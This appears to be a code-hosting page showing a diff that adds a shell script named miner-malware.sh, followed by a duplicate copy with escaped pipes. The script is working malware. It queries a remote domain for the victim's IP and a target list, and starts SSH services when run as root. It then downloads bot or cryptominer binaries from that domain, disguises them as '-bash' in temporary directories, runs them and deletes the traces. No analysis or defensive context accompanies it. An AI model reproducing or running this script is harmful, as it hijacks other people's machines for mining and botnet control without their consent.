Bharat-B · December 3, 2023 21:09 · songyongshun · Mar 21, 2025
diff --git a/miner-malware.sh b/miner-malware.sh
 #!/bin/sh

 domain="pw.pwndns.pw"
 root=$(id -u)
 ARCH=$(uname -m)
 if which curl > /dev/null 2>&1;	then
 	dl="curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o"
 	read="curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1"
 elif which url > /dev/null 2>&1;	then
 	dl="url --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o"
 	read="url --fail --silent --connect-timeout 5 --max-time 10 --retry 1"
 elif which get > /dev/null 2>&1;	then
 	dl="get -q --connect-timeout 5 --timeout 10 --tries 2 -O"
 	read="get -q --connect-timeout 5 --timeout 10 --tries 2 -O-"
 elif which wget > /dev/null 2>&1;	then
 	dl="wget -q --connect-timeout 5 --timeout 10 --tries 2 -O"
 	read="wget -q --connect-timeout 5 --timeout 10 --tries 2 -O-"
 else
 	dl=""
 	read=""
 fi
 myip=$($read http://$domain/?ip)
 servers=$($read http://$domain/servers/server.txt | grep $myip | wc -l)
 if [ "$servers" = "1" ];	then
 	pid=$(ps x | grep -v -e grep -e R | grep -e  "/usr/sbin/ddr" -e "ddrirc" -e "sshd$" | awk {'print $1'})
 	if [ -z "$pid" ];	then
 		if [ "$root" = "0" ];	then
 			service ssh start
 			service sshd start
 			/etc/init.d/sshd start
 		fi
 		cd /dev/shm || cd /tmp ; rm -rf -- $ARCH $ARCH* .$ARCH* -bash;  $dl -bash http://$domain/bots/$ARCH ; chmod +x -- -bash ; ./-bash ; rm -rf -- -bash -bash* .-bash*
 	# else
 		# ps x | grep -v -e grep -e R | grep -e  "/usr/sbin/ddr" -e "ddrirc" -e "sshd$" | awk {'print $1'} | while read -r p; do kill -9 "$p"; done
 		# rm -rf /tmp/.ddr
 	fi
 else
 	ips=$(host xmr-rx0.pwndns.pw | awk {'print $4'} | while read -r ip; do echo " -e $ip ";done)
 	ips="$ips -e 185.45.192.135"
 	ssips=$(ss -np | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' | sort | uniq | grep $ips)
 	if [ -z "$ssips" ];	then
 		cd /var/tmp/ || cd /tmp/ ; rm -rf -- $ARCH $ARCH* .$ARCH* -bash ; $dl -bash http://$domain/miners/$ARCH ; chmod +x -- -bash ; ./-bash -c -k -dp 443 -tls -p 443 -tls -dp 3333 -p 3333 -d; rm -rf -- -bash .$ARCH* $ARCH*
 	fi
 fi
	#!/bin/sh

	domain="pw.pwndns.pw"
	root=$(id -u)
	ARCH=$(uname -m)
	if which curl > /dev/null 2>&1; then
	dl="curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o"
	read="curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1"
	elif which url > /dev/null 2>&1; then
	dl="url --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o"
	read="url --fail --silent --connect-timeout 5 --max-time 10 --retry 1"
	elif which get > /dev/null 2>&1; then
	dl="get -q --connect-timeout 5 --timeout 10 --tries 2 -O"
	read="get -q --connect-timeout 5 --timeout 10 --tries 2 -O-"
	elif which wget > /dev/null 2>&1; then
	dl="wget -q --connect-timeout 5 --timeout 10 --tries 2 -O"
	read="wget -q --connect-timeout 5 --timeout 10 --tries 2 -O-"
	else
	dl=""
	read=""
	fi
	myip=$($read http://$domain/?ip)
	servers=$($read http://$domain/servers/server.txt \| grep $myip \| wc -l)
	if [ "$servers" = "1" ]; then
	pid=$(ps x \| grep -v -e grep -e R \| grep -e "/usr/sbin/ddr" -e "ddrirc" -e "sshd$" \| awk {'print $1'})
	if [ -z "$pid" ]; then
	if [ "$root" = "0" ]; then
	service ssh start
	service sshd start
	/etc/init.d/sshd start
	fi
	cd /dev/shm \|\| cd /tmp ; rm -rf -- $ARCH $ARCH* .$ARCH* -bash; $dl -bash http://$domain/bots/$ARCH ; chmod +x -- -bash ; ./-bash ; rm -rf -- -bash -bash* .-bash*
	# else
	# ps x \| grep -v -e grep -e R \| grep -e "/usr/sbin/ddr" -e "ddrirc" -e "sshd$" \| awk {'print $1'} \| while read -r p; do kill -9 "$p"; done
	# rm -rf /tmp/.ddr
	fi
	else
	ips=$(host xmr-rx0.pwndns.pw \| awk {'print $4'} \| while read -r ip; do echo " -e $ip ";done)
	ips="$ips -e 185.45.192.135"
	ssips=$(ss -np \| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' \| sort \| uniq \| grep $ips)
	if [ -z "$ssips" ]; then
	cd /var/tmp/ \|\| cd /tmp/ ; rm -rf -- $ARCH $ARCH* .$ARCH* -bash ; $dl -bash http://$domain/miners/$ARCH ; chmod +x -- -bash ; ./-bash -c -k -dp 443 -tls -p 443 -tls -dp 3333 -p 3333 -d; rm -rf -- -bash .$ARCH* $ARCH*
	fi
	fi